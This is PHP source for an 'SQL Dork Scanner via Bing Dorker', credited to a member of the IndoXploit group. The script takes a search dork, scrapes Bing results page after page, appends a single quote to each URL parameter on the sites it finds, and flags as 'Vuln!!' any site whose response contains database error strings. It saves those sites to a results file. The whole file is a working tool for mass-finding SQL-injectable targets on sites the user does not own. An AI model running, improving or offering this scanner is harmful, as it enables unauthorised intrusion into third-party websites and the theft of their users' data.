SQL Dork Scanner via Bing Dorker [ Web ]

1. <?php
2. // SQL Scanner via Bing Dorker
3. // Coded by Mr. Error 404 ( l0c4lh34rtz) - IndoXploit
4. // Greetz: Sanjungan Jiwa - Jancok Sec - Res7ock Crew
5.  
6. set_time_limit(0);
7. error_reporting(0);
8. @ini_set('memory_limit', '64M');
9. @header('Content-Type: text/html; charset=UTF-8');
10.  
11. function cover() {
12.     print "<center>";
13.     print " ******        SQL Scanner via Bing Dorker         ******<br><br>";
14.     print " *****      Coded by l0c4lh34rtz - IndoXploit       *****<br><br>";
15.     print " ****  Sanjungan Jiwa - Jancok Sec - Res7ock Crew    ****<br><br>";
16.     print "</center>";
17. }
18. $error[] = 'You have an error in your SQL';
19. $error[] = 'supplied argument is not a valid MySQL result resource in';
20. $error[] = 'Division by zero in';
21. $error[] = 'Call to a member function';
22. $error[] = 'Microsoft JET Database';
23. $error[] = 'ODBC Microsoft Access Driver';
24. $error[] = 'Microsoft OLE DB Provider for SQL Server';
25. $error[] = 'Unclosed quotation mark';
26. $error[] = 'Microsoft OLE DB Provider for Oracle';
27. $error[] = 'Incorrect syntax near';
28. $error[] = 'SQL query failed';
29. $error[] = 'Warning: filesize()';
30. $error[] = 'Warning: preg_match()';
31. $error[] = 'Warning: array_merge()';
32. $error[] = 'Warning: mysql_query()';
33. $error[] = 'Warning: mysql_num_rows()';
34. $error[] = 'Warning: session_start()';
35. $error[] = 'Warning: getimagesize()';
36. $error[] = 'Warning: mysql_fetch_array()';
37. $error[] = 'Warning: mysql_fetch_assoc()';
38. $error[] = 'Warning: is_writable()';
39. $error[] = 'Warning: Unknown()';
40. $error[] = 'Warning: mysql_result()';
41. $error[] = 'Warning: pg_exec()';
42. $error[] = 'Warning: require()';
43.  
44. function getsource($url) {
45.     $curl = curl_init($url);
46.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
47.     $content = curl_exec($curl);
48.     curl_close($curl);
49.     return $content;
50. }
51. function inject($url) {
52.     $data = getsource(str_replace("=", "='", $url));
53.     $errors = implode("|", $GLOBALS['error']);
54.     return preg_match("#{$errors}#i", $data);
55. }
56. function simpen($isi) {
57.     $f = fopen("result_sql.txt","a+");
58.     fwrite($f, "$isi<br>");
59.     fclose($f);
60. }
61.  
62. cover();
63. echo '<form method="post">
64.       Dork: <input type="text" name="dork" placeholder=\'"page.php?id=1" site:it\' style="width: 300px; height: 25px;">
65.       <input type="submit" value=">>" name="submit">
66.       </form>';
67. $dork = htmlspecialchars($_POST['dork']);
68. $do = urlencode($dork);
69. if(isset($_POST['submit'])) {
70.     $npage = 1;
71.     $npages = 30000;
72.     $allLinks = array();
73.     $lll = array();
74.     while($npage <= $npages) {
75.         $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage);
76.         if($x) {
77.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
78.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
79.             $npage = $npage + 10;
80.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
81.         } else break;
82.     }
83.     foreach($allLinks as $url) {
84.         $urls = parse_url($url, PHP_URL_HOST);
85.         $urls = "http://$urls/";
86.         if($_SESSION[$urls]) {
87.             //
88.         } else {
89.             $_SESSION[$urls] = "1";
90.             if(inject($url)) {
91.                 echo " $url -> Vuln!!<br>";
92.                 simpen($url);
93.             }
94.         }
95.     }
96. }
97. ?>